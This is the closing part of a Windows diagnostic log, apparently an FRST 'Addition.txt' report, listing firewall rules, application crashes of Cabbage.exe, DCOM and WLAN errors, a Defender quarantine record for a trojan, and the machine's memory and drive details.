FirewallRules: [{B9C843B7-30F4-4036-9AB8-10823D1AB46B}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{1F497EB5-8070-4256-A954-7DE0FB458FF8}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{C9F244D3-AE69-488F-BFA7-052CE9BA5A12}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{869CAB43-30E5-475B-B5A6-84E1D082BD29}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{59A02139-0E4C-4137-87BE-F7B18EF315B6}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{5822A129-E6A8-4E90-B9A6-82B4535475F0}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{50985CF5-9AB4-43E0-888A-40B2A91E672E}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{01738336-B366-4441-B98C-8C33436F9D75}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{922812C0-F35E-49AA-B977-55CDED44A213}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (05/26/2019 08:04:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Faulting module name: ntdll.dll, version: 10.0.17134.556, time stamp: 0x74bed8b0
Exception code: 0xc0000005
Fault offset: 0x000000000003b6e8
Faulting process id: 0x176c
Faulting application start time: 0x01d513f421b1b145
Faulting application path: C:\Program Files\Cabbage\Cabbage.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: ac67a311-600e-41c7-8b6b-49063784929a
Faulting package full name:
Faulting package-relative application ID:
Error: (05/26/2019 07:28:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Exception code: 0xc000041d
Fault offset: 0x0000000000244383
Faulting process id: 0x2bb8
Faulting application start time: 0x01d513f0aab5c790
Faulting application path: C:\Program Files\Cabbage\Cabbage.exe
Faulting module path: C:\Program Files\Cabbage\Cabbage.exe
Report Id: 7f30f9fe-957e-44fa-84ca-2788316ab296
Faulting package full name:
Faulting package-relative application ID:
Error: (05/26/2019 07:28:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Exception code: 0xc0000005
Fault offset: 0x0000000000244383
Faulting process id: 0x2bb8
Faulting application start time: 0x01d513f0aab5c790
Faulting application path: C:\Program Files\Cabbage\Cabbage.exe
Faulting module path: C:\Program Files\Cabbage\Cabbage.exe
Report Id: be1329eb-1134-4ce3-a796-f72b458a3beb
Faulting package full name:
Faulting package-relative application ID:
Error: (05/26/2019 07:22:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Exception code: 0xc000041d
Fault offset: 0x0000000000244383
Faulting process id: 0x1718
Faulting application start time: 0x01d513efe7bd8b31
Faulting application path: C:\Program Files\Cabbage\Cabbage.exe
Faulting module path: C:\Program Files\Cabbage\Cabbage.exe
Report Id: 64185bbe-49d4-42f8-8a47-c9e07a4c3c44
Faulting package full name:
Faulting package-relative application ID:
Error: (05/26/2019 07:22:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Exception code: 0xc0000005
Fault offset: 0x0000000000244383
Faulting process id: 0x1718
Faulting application start time: 0x01d513efe7bd8b31
Faulting application path: C:\Program Files\Cabbage\Cabbage.exe
Faulting module path: C:\Program Files\Cabbage\Cabbage.exe
Report Id: 51ee6e37-6783-46c7-a828-9b24dfe2bf09
Faulting package full name:
Faulting package-relative application ID:
Error: (05/26/2019 07:21:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Exception code: 0xc000041d
Fault offset: 0x0000000000244383
Faulting process id: 0x253c
Faulting application start time: 0x01d513efa2daa570
Faulting application path: C:\Program Files\Cabbage\Cabbage.exe
Faulting module path: C:\Program Files\Cabbage\Cabbage.exe
Report Id: d7b797aa-278a-4f95-98d4-982478a63022
Faulting package full name:
Faulting package-relative application ID:
Error: (05/26/2019 07:21:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Exception code: 0xc0000005
Fault offset: 0x0000000000244383
Faulting process id: 0x253c
Faulting application start time: 0x01d513efa2daa570
Faulting application path: C:\Program Files\Cabbage\Cabbage.exe
Faulting module path: C:\Program Files\Cabbage\Cabbage.exe
Report Id: 8aa8d005-408f-4ee4-867e-78768dfee6bc
Faulting package full name:
Faulting package-relative application ID:
Error: (05/26/2019 07:19:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b
Faulting module name: ntdll.dll, version: 10.0.17134.556, time stamp: 0x74bed8b0
Exception code: 0xc0000005
Fault offset: 0x000000000003b6e8
Faulting process id: 0x10c
Faulting application start time: 0x01d513ef56b8ca81
Faulting application path: C:\Program Files\Cabbage\Cabbage.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: e7e16031-81be-4a2e-b43d-81a6c54fb82e
Faulting package full name:
Faulting package-relative application ID:
System errors:
=============
Error: (06/09/2019 07:50:54 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
and APPID
Unavailable
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (06/09/2019 07:49:30 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-DQ6B75G)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
to the user DESKTOP-DQ6B75G\MYMLA SID (S-1-5-21-1007420050-912919110-3395148121-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (06/09/2019 07:48:21 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-DQ6B75G)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
to the user DESKTOP-DQ6B75G\MYMLA SID (S-1-5-21-1007420050-912919110-3395148121-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (06/09/2019 07:48:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
and APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (06/09/2019 07:48:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
and APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (06/09/2019 07:46:31 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\WINDOWS\system32\Rtlihvs.dll
Error: (06/09/2019 07:46:31 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\WINDOWS\system32\Rtlihvs.dll
Error: (06/09/2019 07:46:25 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\WINDOWS\system32\Rtlihvs.dll
Windows Defender:
===================================
Date: 2018-09-19 18:10:38.815
Description:
Windows Defender Antivirus scan has been stopped before completion.
Scan ID: {150C15E3-BADA-45B8-8663-5719F59E911F}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2018-09-19 17:57:05.840
Description:
Windows Defender Antivirus scan has been stopped before completion.
Scan ID: {7571F3C6-5B24-4D15-B83D-7E6731A8E994}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2018-09-19 17:39:46.437
Description:
Windows Defender Antivirus scan has been stopped before completion.
Scan ID: {5757DC07-376D-4FF9-AA15-CD210EDB7DC7}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2018-09-19 17:12:25.633
Description:
Windows Defender Antivirus scan has been stopped before completion.
Scan ID: {939F5361-6C75-4B17-863C-FD6EA9258FD5}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2018-09-19 16:47:47.928
Description:
Windows Defender Antivirus scan has been stopped before completion.
Scan ID: {17F49943-FB39-4F5C-8487-B09F31A1A498}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2018-09-19 12:50:34.004
Description:
Windows Defender Antivirus has encountered an error trying to restore an item from quarantine.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Genbhv&threatid=2147728464&enterprise=0
Name: Trojan:Win32/Genbhv
ID: 2147728464
Severity: Severe
Category: Trojan
Error Code: 0x80508014
Error description: The quarantined item cannot be restored.
Signature Version: AV: 1.275.1487.0, AS: 1.275.1487.0
Engine Version: 1.1.15200.1
==================== Memory info ===========================
BIOS: LENOVO O38KT20A 06/09/2017
Motherboard: LENOVO 3100
Processor: AMD Ryzen 5 1400 Quad-Core Processor
Percentage of memory in use: 41%
Total physical RAM: 8129.54 MB
Available physical RAM: 4720.91 MB
Total Virtual: 9409.54 MB
Available Virtual: 5488.57 MB
==================== Drives ================================
Drive c: (Windows) (Fixed) (Total:1840.68 GB) (Free:438.43 GB) NTFS
Drive e: (NIKON D90) (Removable) (Total:1.84 GB) (Free:1.79 GB) FAT
\\?\Volume{83fcff60-2af0-406f-800a-334a93db52ca}\ (WinRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.58 GB) NTFS
\\?\Volume{c262150b-f125-435c-9e9e-88ffa3ed74e4}\ (LENOVO_PART) (Fixed) (Total:20 GB) (Free:8.46 GB) NTFS
\\?\Volume{d22b1664-b5cd-4faf-ab62-e32099f20f5c}\ (SYSTEM) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 1863 GB) (Disk ID: 4212AA6F)
Partition: GPT.
========================================================
Disk: 1 (Protective MBR) (Size: 1.8 GB) (Disk ID: 00000000)
Partition: GPT.
==================== End of Addition.txt ============================
